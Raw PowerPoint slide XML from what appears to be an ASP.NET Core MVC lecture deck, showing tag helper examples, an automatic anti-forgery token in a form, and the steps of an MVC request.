              <a:t>="CfDJ8AFtmUdx-b5MkQvAyGYbjFmMGSMv0Fmk7gG4RqGXlkNV6yqKqj6fgqnOh4TLT6ZnWSaqtAbKkgpEB20lvfkc2iOKZKIqt3tJ4Jij8DjmatTrZo-DKVOLwwOzj3kB8VKpFwc0rQMjaJTTC_gVv5f0vAg"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6637394" y="5486400"/>
            <a:ext cx="5021206" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatic Anti-Forgery Token!</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40712192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Tag helper</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asp-controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asp-action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="Display"</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>route</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ViewBag.ProductId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>View</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Details</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ"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href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="/Product/Display/1"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>View Details</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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1047621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a View</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View takes model data as input, and outputs it in user presentable form (for example, HTML)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800077" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User sends a URL request with query string values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800077" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controller is triggered against the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800077" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controller handles query-string values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800077" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controller passes the values to the model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800077" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Model uses the value to query the database and returns the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800077" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controller selects a View to render the UI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800077" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controller returns the View to requesting browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6260005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Tag Helper</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-1" b="1035"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="423822" y="1447800"/>
            <a:ext cx="11130996" cy="4016833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27504968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Tag Helper</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addTagHelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"*, WebApplication3" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>svg-shape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>circle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
